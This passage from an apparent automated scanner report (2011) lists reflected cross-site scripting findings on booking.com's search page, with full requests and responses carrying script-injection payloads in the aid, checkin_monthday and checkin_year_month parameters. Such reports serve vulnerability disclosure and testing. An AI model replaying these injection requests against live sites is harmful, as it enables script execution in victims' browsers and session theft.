Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:06 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAGM9O1PxW9r04KF2ncDEBSHgNUXVAzVnXouEVrERXP8sy7P%2BCaMJUcQFZu89oIgncJuDQvP4RNo3KkrZuPvEkX%2BrydBU649KACjP15pDvznmAHESRGAjWDPj2XBbZ20CKN63nZQ%2BubhUjBXJheWpgkq9WzKmN1Y55fwW2qXYEDkMWLRPGDTQ04mjUp2ZrYseiu%2FxeH3bkK8WA4IKsBRoTR%2Bde1oWqSHhS62phaJI2koebIBJAYqlTDO2e7adNDgwqdSyA%2B7BLc%2FVbAwCeqdXTZ1CtAtG7491NrkorDjVvsm12Qgq623Als0UzoBv80AXQSY%2Bn3CvatxZB7HJ2iozE3YouPFrlPHMZgiI4LsEeSqSM7C9YFHYO4ho3qMZwxa0O76JFbUFb4W%2Fy22SKfRUcrYSMcRbnsbLmCXhLYc0Rvm3uPWTshBm7amXDl6oyma75EhCDqZl4idV8Bnos8XE1Dk39BiDyUXxR%2BtzA%2FtEafmHy%2Fcz%2F%2FWhs6aq7Q8OfbCP36NV%2FH20sQKm0TTLmmSVJ%2FWtOKdxLfNBIOCrj0mrFV2xueb4lWBLhDycEpebaZXcXFw0ox1yyHgzwDQI9CDChUJcuKpWmx3p8d4wMPurfdAAjvugd2V1toFJBkLQIirzwT5aTjPY47znz919Ap6GS1dr%2Bx0aZ762IwEak5eNZANtTArYxKdLWna01iT%2B8VvDE0leQRYVYRle3VdRyfzkXjUVGHkaNPd%2FVzAzPUqTgr5DBnTskNeyE1LOcj75nPBVGLtPD8MAPZp7BTFUWhW4iX%2BUz4nSZFJ8VDN%2B9xIuPoutaapBSn9P1QMHJFuKTUI2KCUddOHxvhmruzSzhHLM5dv%2FxCwwm%2B1er3ChCOnov5SWB8diPPxpuPk2gxVClueSuT0jCgMkIzcXK6RX5X6FyBX3qRKM3LNbfdHZs0VIUayEd4sKD7PXhCbwpS8zc%2FeVlz6OZVv9nh0LrnACGEi7CHAU4RBkDaJON7ZwEma5R2wKO31RwhqGUBNVOIeQL%2B%2FUJ2%2FC%2FUU%2B7XdJcNjotA2uL%2FE5N7Dnf1X%2FW9GI6wJPv49vl1oFTWdjZi93R1Uljs9nXXMSvsU1LaYXqVKEBVfn1ngeLGA3O35Jx2FzNCAan7peaGnSvEKtt5h9wzybMdPoVfIlK3nVKJsFAZfW0OCZ8eOfyi3jgcL7vTDBnVvE%2BlpjseifN6ESCeZVxYlcWgP7%2Fa6dG%2ByJFOSNvkGKbdzSPsP6m5gprwwwAyDqEbj%2BpqqLfFFgMtgd9%2FZ2OyA4SWqy%2Ff8Mo9tEjQW%2F6c6BAnqLG0b%2BhJ9%2FVC5ZVxOIpUdljs6DVLbBUbdFZXtKJyZXsri9RkKr%2FNeHdbN%2Fg3SIJQiLRCztepXtUFeHwX4%2Bq%2BJNlYtSbZ0i7XLfFkFPyCR7cxExPY21L24Ps%2Fb7LlsjYuYi40w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:07 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 385825
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
296=1&amp;',
"b_flag_to_suggest" : 'us',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=33559116594</script><script>alert(1)</script>dbafd62ac0&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign
...[SNIP]...

4.211. http://www.booking.com/searchresults.html [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the aid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d852f"><script>alert(1)</script>9c61548c4a4 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591d852f"><script>alert(1)</script>9c61548c4a4&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:27 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4ZnAyJLzPOBzWBuP%2B1qTRnLZgE%2FVJTkrYDYAgvlE8v6S1WIA01ZhQxEv402Kr88%2FCfLth59ZdFekQjiWJEdDDJtlv653nFV6MCmiw9Q%2BsjNTtFYtNsQ%2F4lYDW5GhCaPNyrNKaNruGf8Xa%2FcIrf2SdQA3%2FM3XuKCOWR5HGSDoffP8pJttFsFRlbUhFiaRlaiHgVb0EkURJLTQt3V1jftDNtid%2BuZ4LxKCnlWeTcXhqbd64vAZsTyzEd1wWr1ECaw%2F%2Fg%2Fw%2Foj5GK9JsRwekYSgHRO41Gs0Q1nGyx7dYBykQnfskwCVPgnFoxWfyK742YeOEjs2pWq0ZC82DC9sLF2L9VGHZ6Uz8%2Bc19A8rppNUXHaoJZtJoFtwlMi7mA5vxxYIOAPpdD3Uzwz2nZ4JL6QKUSgHpaDBS1w%2FnqNVpwimW73EiacZSfdO8IRXLTDzmkf7k7IqOYKNqwN4o9i0G09XqCY3yFPaYbq5fzBHkCS5HWIGjXzx%2FIZXjaSz%2BRcGf%2F2BbK0RMy9fFEYLJSkrwvJ%2FP2S1PiiV8Vf3ZpNKMm0f1vPXLOn5M7XsgS5nzxlBMOsntB%2BV8x7pMrPfcA1ddlIknj5M3Ctkqv8J0%2FJduYe85QfSkIFeOWsOrxm1zF6%2FgHSRs0PA018J1XrWq334CBd7F66jdQ3YH83rhW1k5CT%2FMQvaSmjXng5b7WBBCakSEGaUMOuusfwNX%2Fe94STbOwoQNHrbDJg8qRroJfOSsLK8AbwoznOkhrwhBGrdfVtrNlDDy4drLLy%2B3XfbV8AUsj3sLhLM%2BRMgB2ECJrqZCy6%2FiwPSKo2pOWBQtYbkC2Pyd40g3NOurcAwpG0Rx5aUqCwJ45LQsZTyRYOesvsIrJEFbFYxFgYJgNsHi%2BpnsjDxQ4VvIEOSIjnMPvSPLSa2%2B7qNbPnrWq%2Fr0dpb%2BPWQVs%2Ba3OndcJ4pP9H%2BAxv%2FkJkJJLjT%2BqclDW2nSPrxXc3vZxKkvVlsTG3A5ixcdc3jJstFvueTvQAXPDoId3%2BVYscwHLf452UvpTYruHQXRgislE4XrlS%2FENbP5n4s5%2BmkeyhdFnMzOS0NRpucGI9reYIOW%2BLwinCI3oaImjfFPU5ChNAzNsDcgFdfI9b9BdPVn5rmk2tHCb9o1IlTLmQppgkdsUpGX2csQKPvZ3D2khQyljh2c3Jv4%2B9ygbUUlHWJj1NQ8dPntRqOT1iCMj9AwhmF0MyONkZiT%2BeOLEQGVWNsTgO2GH%2Bt545EL3dlQMLrb2t0li%2BRVTrP8MSCsjr7%2FzvkPzFoTyRyhj5%2B4fRNVTJmxXCgA0G%2BuibIqRU12TowMtDZb7eBt0omwjZC%2BeaMpTsKWA2NtrDf7v1ZneBWqV3rnJG6dWnGxiKfkBkXAcZ4Oion6yMLvuAV5i4a4iI2Xt5HCpS6KDYYAaYZCq%2FLENg5StfG3pw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:13:27 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 385978
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<a target="_blank" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591d852f"><script>alert(1)</script>9c61548c4a4&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign
...[SNIP]...

4.212. http://www.booking.com/searchresults.html [checkin_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb50"><script>alert(1)</script>b96c0c3da70 was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04abb50"><script>alert(1)</script>b96c0c3da70&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:27 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xlqEYJetszTSFEJ5opEtwKeeSIw3ngok9G03LHThCOjdxnGEeKkVBMwECBsqWm7cVMlbsTgQgwdSwOKMvNqfQgB7Y2yvJRNqgUqYzp%2F9HjZruDNc5YU5dH%2BK%2Fqs3t4%2B9XVw9K3X9h7hr6p1aX83FOmGifdGyY%2F%2FtlcdFYg3UfSOoOLYRBAdcJwHMC4eLyr9LfMSZ2S2lfiVFu9rZF4wfI0jXZ3MktJrkHso%2B5YD1LtPkJlIcqmDeNskdO7GOr%2Fp186o63Z2ECsPNKEPPwoIOUuny2N66k7b9UBesmgcCDMloBYqIg4nT6M%2F0O5zlVZzHPn2yPBH14eb94AU%2FBv79eo6j80yaSt89bbyoQby2wZ96PwIJJMMGS%2FolOAXe8XVmlXdeFhvRZbnbYGq3RAKOd8e4kSr6Na2VWopkhGzvcGu%2FVVuey0hYlTxzBG5MuUSsB1paTCqSqKhas1hp9lz2AU1NSAUOiT1gKnmU0WcwhPMgPT6xdhlJl5GQurjXgvORt6fXwo7hkDxnPopCISzrf9ZhSeCA1GLi%2Fb78gLmhVYqRc63xhFYfdAHr2lsxwJO0GUfPwuxjc06Z7VmdXEK6wy%2F%2F%2F5YAg5dbYdafrwZs22Il3auQHl%2BUf0SzZQ1S9F1q3jIdCkOSQ1Bfnw%2B6rVP0jfnbzfWrOy%2Ba7I%2F1bGHphkuDGpYzvBLQN7Fix1U9k6Ci0C9lShF4Jb8q5dgV04%2B69yXSG%2Fmdz9zX1FTzNajPHkleHI2KQZ8zabdpiOfc%2FPtei11Wqu%2BqWGFs7ZUxLBf5xdsuUWK9qn8B0a1PUk7OpLjRwBCz9nMrs37QC24FzlcbOueZ0ykEycGrFHzMFySV%2F9JGT1erbm90r70evUO9RbCwoCc19g4KQ%2BRdTi0DwCZh7gbd12Tj%2BArLgtLnzxeiOzpdO5vkVB249mCUffXt0o0M7zyv3flSw%2FDg6dN9Yy2xftATILQsO%2Bi3oUB1ePwkY1xtge5gwi4AC0zb3AO3KUjnfjijj4NO1y%2BLuQW0tyjUBrTMHmQfn4tW62yQkYIf0kA3xhQe5k6bR2AdEo0GLRFnWfJjFrCXrliOZ7ffdcK3Ce3Fl3LJe59JFZLr6I6UpJtbM1yElbzWMNzPCgId6NYHks6dyGfKi5hdGuFyjnyjDkZhvtt%2BcfO5Ge1kD778a9P6jpEwNWlkfBvJLlcxpkI1hN%2FkKDWwRbSb6vdFn4Hlf9t48e%2B6o7wXNCU1PN7Vuou81NSpGnQHHoclX7sKMJlS2TFdHJneAaNnxOZHz9lQp1Z%2F1rI%2FuXS3uij99DoGiyWPtAa9oioI%2F6%2BTe3To%2FXxKZW2LBYUM%2FOpfDmboGN7%2FLLdzwGWomth2JBDqLu6xO3l%2BgQdxOwGy3zlbNeFySGo7B%2FW6pv8m50%2FzgpvrHUbPz02F7yQmxOqvNcalNMUvR0FVcrTcWQCRtw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:16:27 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 278498
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04abb50"><script>alert(1)</script>b96c0c3da70&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...

4.213. http://www.booking.com/searchresults.html [checkin_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 831ef</script><script>alert(1)</script>c56720788c0 was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04831ef</script><script>alert(1)</script>c56720788c0&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:55 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YVuoakmCuggKVBk4dVUHfDVnewdIvAmgoL0tSDTgFt9zgdISpAL9zaHjp6X9Iy1Q%2BUur%2B%2FRf37bFsaJsXw908W4diQTtTz13fHFhiEf%2FmLPYV%2FFGUzga5TwTyRd7Zqi5YdeROYvwI09F7R%2BHenmuEuJcMR%2FnFxXN%2FRAMEqLwczMSu34en%2FtI3AeEAtwK%2BBHe7jzOabclaj5UiseUxH3%2B6POt6jcGBLpsrYHQBSrxdHkAIY9CjOLB%2FbW6pDR0cPFb1Za3Vt022IKEwCF6AZ3n4zWvOKJs8BVmyo1ck5vPnPE4j9INed765odKzPMz5u1oFAl%2FpGd7isYZrIQNeSQ2u6CQhaSh%2FiKhyqvUBcnbv77xDHmzZPM6uA%2FULLH82QUtuW1MA8%2Fe8Lxz%2BzC8Jpn9eWSNdd3YOQOExP4JHg0ZTwPq5ygvygKvnyNngGlJmX8AvpISLdaJLPBuHKAFM4mLCx164EFuXFeLXLFI4Y8%2BFz7sDavEPeX2A6G0LKkMybTIU6VqU4Eb6QV5efi1fQI1pV4w8Ud3z%2FdyDcTZDOfCzXjnPvD%2BPekw0LLvFmUN88qQloqwt6aSzpTNcLwH8q93J9En2%2FAEWmlhiancoHjmEr9gFyYfgt7%2BKjTYAfeKfU4A%2BcXIq%2BxeayxrIPKurH6O8EIwdXr0YvAMdjjDEjRoj4RJ7Du%2FFwI0p%2BWoDDrz4mn2JbCfObAyCb%2BVVYak5pJqw2Hp68M6fEOKCVGT9E5Cz6DeT2rVyT5EfIogClFHau8pHoDDRK%2F%2FrLF6zfhuDNvHiI79UN%2F44ZPwOnf9cEAHHdvHV%2Fw0Ln60jq9qAgvHMs5y6xII9yg%2F2BJbGt%2Fhk8DoeNjse3WJBOaQZj5RKKkUKHuoVzkt4nlNSmfjDO7HkXtFfASCQr6eTanvfzRBBK%2Bc3LxB5K0UK1fwe%2Bx1D4zWF99eqTh6tlNgeSjBuxI85Z9HFRebeDaV6%2BhlXRnc%2BNwzDSm%2BbEwBFRFE61mYpf9zBnf0xEJCKV70IxteV6YFgjfqvBjU3vY7f591%2FxPzpqad8T3OTLrlr8SIbBoNN4P9esRp8HhSsV2KHUymQVyhn%2FoqmC8DlmdD2RX4QizimqbQH3pwa9Zo46DcmglZQSZwCmCjAF5mBHM1ee9qhOnPNQhkId%2BiIaDmSWW3AJTdzT8t8AXHLXAwtDlshe2CLBOc%2BCHU9NI9PDQECjY%2F6JybHpM6x4K8sCyLhVuBRThTso1FY3xVef%2BXOD8qCDD6qErLoFORugtbq9tNqEt2lO5YZDcYB6AiyVMiafC8qBvvYqMaysVH4bGUVnwuV89xiL7WadP47KXZYAHtqVxOAzN9D70UiKvwhh%2FwpQbV62m0dJ5OvFotr7vkn7giglsjwZlKJ8iR6%2BjkRxjDpPsqQlE5MBTCjQoy8qHps13Nh655VfWxkV6haJpW4S2k8A%2BFkUMeMB3TIcBhzjFpgfW43LxTOeGt5g%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:17:55 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 278343
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04831ef</script><script>alert(1)</script>c56720788c0&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults
...[SNIP]...

4.214. http://www.booking.com/searchresults.html [checkin_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4609</script><script>alert(1)</script>364dfd52e62 was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10a4609</script><script>alert(1)</script>364dfd52e62&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
